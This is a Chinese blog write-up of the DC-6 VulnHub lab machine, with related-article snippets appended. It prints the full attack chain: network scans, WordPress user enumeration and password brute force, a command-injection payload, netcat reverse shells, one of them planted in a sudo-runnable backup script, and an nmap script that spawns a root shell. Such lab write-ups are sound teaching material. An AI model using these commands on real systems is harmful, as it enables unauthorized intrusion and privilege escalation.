DC6靶机训练

最新推荐文章于 2025-04-17 11:54:24 发布
最新推荐文章于 2025-04-17 11:54:24 发布
阅读量323 收藏 2
点赞数
分类专栏: 内网安全 文章标签: php perl 深度学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51353029/article/details/120128904
版权

kali:192.168.78.131
DC-6:192.168.78.140

ifconfig
nmap -sP 192.168.78.0/24 
nmap -p 1-65535 -A -sV 192.168.78.140

在这里插入图片描述

访问80端口,查看框架

在这里插入图片描述

眼熟的WordPress,扫描域名,寻找我们需要的登录框

find / -name "dirseach*" 2> /dev/null (查询dirseach模块在哪里
python3 dirsearch.py -u url -e php

找到我们需要的模块: login.php

在这里插入图片描述
访问然后查看

在这里插入图片描述

既然前面说了框架版本是wordrpress,那就使用WPScan登录爆破

wpscan --url http://wordy -eu

扫描出账户,保存在name.txt中
在这里插入图片描述
进行密码爆破

cat /usr/share/wordlists/rockyou.txt | grep k01 > pass.txt 
wpscan --url wordy -U USER.TXT -P passwords.txt

在这里插入图片描述

登录页面,发现tool这个地方存在RCE(打过CTF的看一眼就知道)

在这里插入图片描述
尝试一下看看是否存在RCE

127.0.0.1 | ls

在这里插入图片描述存在RCE,经过测试这里有长度限制,修改一下即可

在这里插入图片描述
反弹一下shell

nc 192.168.78.131 2333 -c /bin/bash

在这里插入图片描述

拿到shell,切换成交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

查询开启的SUID

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null  ## 两个命令都可以

在这里插入图片描述
没有什么可用的,查看一下用户文件,发现提示文件发现了graham的账户和密码,SSH登录

在这里插入图片描述

看一下SUID:

在这里插入图片描述
依然没有可以使用的

sudo -l
显示出自己(执行 sudo 的使用者)的权限

在这里插入图片描述

可疑的脚本

在这里插入图片描述
很显然jens作为用着具有更改修改脚本的能力

在这里插入图片描述

修改脚本反弹shell:

vi xxx/xxx
nc -e /bin/bash 192.168.78.131 2333
sudo -u jens /home/jens/backups.sh

监听反弹shell

在这里插入图片描述
紧接着查看一下SUID SUDO

在这里插入图片描述

发现nmap可以执行,因此接下来就是nmap提权
nmap 不清楚

cat os.execute("/bin/sh") > nse_root.nse
nmap --script=/home/jens/nse_root.nse

提权成功

在这里插入图片描述

拿到FLAG

在这里插入图片描述

总结一下这个靶机:
这个靶机比前面的靶机更有意思一点,也是因为自己没有什么耐心,所以老是会去看WP,这次靶场一共有3个用户,我们进行了横向移动,最终完成提权:
我们首先在A账户里面发发现了B账户的账号和密码,然后通过B账号的账号和密码查询SUID发现了拥有者为C账户的可编辑执行脚本,于是反弹shell拿到C账户的shell,然后通过C账户使用nmap进行提权,最后拿下FLAG,做完之后发现做题需要的更多的是耐心,只有一步步探索才能真正享受乐趣

靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 623
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
靶机DC-2(新手训练
kyp_1994的博客
09-06 1041
dc-2靶机渗透靶机渗透,新手
DC6-靶机渗透
banacyo14206的博客
08-22 606
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC-6 靶机渗透实战笔记
最新发布
syg6921008的博客
04-17 792
信息收集与初始突破:通过域名识别和 WordPress 渗透实现初始访问。用户口令弱点与爆破:WordPress 用户弱口令爆破拿下后台访问限。插件漏洞利用:借助插件中命令注入实现 RCE 并反弹 shell。横向移动与文件分析:利用残留文件中的账号信息,实现横向用户转换。脚本配置不当:通过备份脚本反弹 shell 到 jens 用户。Nmap NSE 脚本:利用 sudo 限下的 Nmap 执行恶意 Lua 脚本获得 root shell。此靶机综合考查了。
DC6-靶机
Au
10-30 1781
下载地址 下面是作者的示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
DC-6靶机
Flamingo1998的博客
02-23 243
DC-6靶机
靶机DC-1 11111
09-25
靶机DC-1 11111是用于特定军事训练和武器测试的飞行器,其文件包可能包含了对其进行操作和维护所需的关键资料。对于军事航空研究者和使用者而言,这些资料是宝贵的信息来源,有助于升实战能力和技术运用水平。但...
Vulnhub DC-8靶机攻击实战(一)
初学者
01-16 1272
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新一期关于Vulnhub DC-8的打靶训练,如下所示。
39772.zip靶机所用文件66
08-11
【标签】"dc3靶机所用文件"进一步确认了这个压缩包的内容与DC3靶机训练有关,文件可能是为了设置、维护或挑战靶机环境而设计的。这些文件可能包括配置脚本、漏洞利用代码、安全工具、日志文件、证书、数据库文件以及...
DC-4靶机Web渗透测试实战指南
DC-4靶机可以作为信息搜集技能训练的对象。 2. 漏洞识别:在靶机环境中识别出安全漏洞是渗透测试的核心环节。DC-4靶机内设有多种已知漏洞,包括但不限于操作系统漏洞、Web应用漏洞、数据库漏洞等,测试人员需学会...
vulnhub之DC6靶机
LainWith的博客
02-14 611
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
Dc-6靶机实验
weixin_52263461的博客
03-17 484
靶机DC-6下载地址: https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 虚拟机软件 DC-6靶机IP地址:192.168.62.136 Kali的IP地址:192.168.62.135 使用nmap工具扫描192.168.62.0网段的存活主机,发现DC-6靶机的IP地址为192.168.62.136 使用nmap扫描靶机开放的端口,已开放端口有22(ssh)、80(http) 浏览器地址栏输入靶机IP地址,发现显示域名但无法
渗透测试:DC-6靶机
Ciyaso的博客
08-21 352
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
DC靶机系列:DC-6
Ays.Ie的博客
02-28 696
本篇文章为DC系列第6靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
【每日打靶练习】靶机渗透实操-W1R3S(易)
leo788的博客
12-29 1304
试试读一下/etc/shadow文件,该文件存放用户名密码,得到了很像密码的两部分信息,分别对应着www-data用户-加密密码,w1r3s用户-加密密码,使用最小速率为10000来扫描靶机ip开放端口,端口数量为65536个,所以设置10000的速率来进行扫描,其默认是tcp扫描。对页面上的信息cuppa cms进行匹配,获取到一条信息xxx.txt,检查一下,发现cuppa cms这个存在文件包含漏洞。开放端口有:21-ftp,22-ssh,80-http,3306-mysql。
靶机实战-DC-6
滕财然的博客
03-03 932
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
渗透测试学习之靶机DC-6
xdbzdgx的博客
11-28 7237
1.下载靶机 本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-6的下载地址为DC: 6 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-6只有一个flag。 在VMware加载成功之后并开启,建议把DC-6靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2208
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与1.得到SSH账号2.登陆对方SSH3,切换用户并 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
dc6靶机 www-data
12-29
### 关于DC-6靶机中`www-data`用户升的操作指南 #### 使用SUID文件 在Linux系统中,某些二进制文件可能具有特殊限位设置,允许普通用户以更高的限运行这些程序。通过查找并利用带有SUID位的可执行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值